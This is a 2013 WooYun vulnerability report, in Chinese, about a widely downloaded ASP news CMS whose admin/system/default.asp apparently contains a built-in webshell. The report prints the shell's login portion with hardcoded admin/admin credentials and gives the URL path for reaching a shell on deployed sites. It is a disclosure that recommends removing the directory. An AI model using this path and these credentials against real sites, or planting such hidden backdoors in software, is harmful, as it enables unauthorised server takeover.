当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017094

漏洞标题:超强图文新闻系统 v2.0疑似内置webshell

相关厂商:超强图文新闻系统 v2.0

漏洞作者: LeadUrLife

提交时间:2013-01-08 19:23

修复时间:2013-01-08 19:23

公开时间:2013-01-08 19:23

漏洞类型:源码安全

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-01-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我很好奇某个源码文件用意。。。

详细说明:

到站长下载看到一个小系统9w多下载量:

oday.jpg


体积很小,好奇下之,这里是下载地址:

http://down.chinaz.com/soft/1279.htm


大致看了下,发现一个好玩的东东,不知其用意
抛开“常规后台”/admin登录帐号口令%绕过不说,来看看位于admin\system\default.asp的代码

<%
systemname="admin"
systempass="admin"
%>
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>System Administrator ver 1.1</title>
<style>
body{margin:0px;scrollbar-face-color:buttonface;scrollbar-highlight-color:buttonface;scrollbar-shadow-color:buttonface;scrollbar-3dlight-color:buttonhighlight;scrollbar-arrow-color:#797979;scrollbar-track-color:#EEEEEE;scrollbar-darkshadow-color:buttonshadow}
body,a,table,div,span,td,th,input,select{font:9pt;font-family: "宋体", Verdana, Arial, Helvetica, sans-serif;}
.text{border:1 solid buttonface;background-color:buttonhighlight}
.button{height:18;border:1 ridge buttonhighlight;background-color:buttonface}
#do{background-color:ffffff;color:FF8000;text-align:center;width:8pt;height:8pt;corsur:hand}
#box{width:7pt;height:7pt;}
a{text-decoration:none;}
</style>
<body onSelectStart="event.returnValue=false;" onConTextMenu="event.returnValue=false">
<%
adminname=Request.form("adminname")
adminpass=Request.form("adminpass")
if adminname=systemname and adminpass=systempass and Session("admin")<>"come" then Session("admin")="come"
if Session("admin")="" then%>
<table border=0 cellPadding=0 cellSpacing=0 height="100%" width="100%">
<tbody>
<tr><td align=middle>
<table border="0" cellpadding="3" cellspacing="2" width="200" align="center" bgcolor="EAEAEA">
<form name="form" method="post" action="default.asp">
<tr><th bgcolor="AAAAAA" colspan="2">管 理 员 登 陆</td></tr>
<tr><td>用户名</td><td><input class="text" type="text" name="adminname"></td></tr>
<tr><td>口 令</td><td><input class="text" type="Password" name="adminpass"></td></tr>
<tr><td></td><td align="center">
<input class="button" type="submit" value="登 陆">
<input class="button" type="reset" value="取 消">
</td></tr>
</form>
</table>.............


你懂的。。。。。

漏洞证明:

访问http://site/admin/system/default.asp
输入 admin/admin
你将看到一个标准的asp shell

oday2.jpg


修复方案:

去了system目录吧 要也没有。。。

版权声明:转载请注明来源 LeadUrLife@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2013-05-21 14:56 | LeadUrLife ( 普通白帽子 | Rank:103 漏洞数:14 | 好好学习 天天向上)

    http://down.chinaz.com/soft/1279.htm 站长站居然更新了!!!